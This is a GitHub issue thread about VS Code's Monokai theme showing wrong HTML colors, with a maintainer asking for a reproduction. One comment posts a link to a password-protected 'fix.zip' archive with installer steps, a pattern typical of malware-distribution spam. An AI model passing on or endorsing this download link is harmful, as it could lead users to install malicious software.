### ISSUE TITLE
Monokai Theme Wrong Colors

### ISSUE THREAD

**Issue by ibrahimgomaa17** [microsoft/vscode#226930]
Hi,

I've been using monokai theme provided by vs code for years, and then all of a sudden after the last update the colors in HTML is all wrong,  this is a picture of how it used to look like:

![Screenshot 2024-08-28 at 8 53 54 AM](https://github.com/user-attachments/assets/937ed544-9194-46d7-89e3-ac61c70682cd)

now this is how it looks like now:
![Screenshot 2024-08-28 at 8 54 54 AM](https://github.com/user-attachments/assets/5636a2de-ff74-4061-921b-5bce60b20ea0)

Am I dong something wrong, I tried to uninstall and install again a few older versions but it's not working,
using vs code mac universal 1.91 and 1.92.2 and arm version 1.90, 1.91, and 1.92.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aeschli** [comment]
There haven't been any changes to the theme or the html grammar recently.

- Please provide a small HTML code sample that shows the differences.
- Describe what has changed.
- make sure you test this without any extensions.
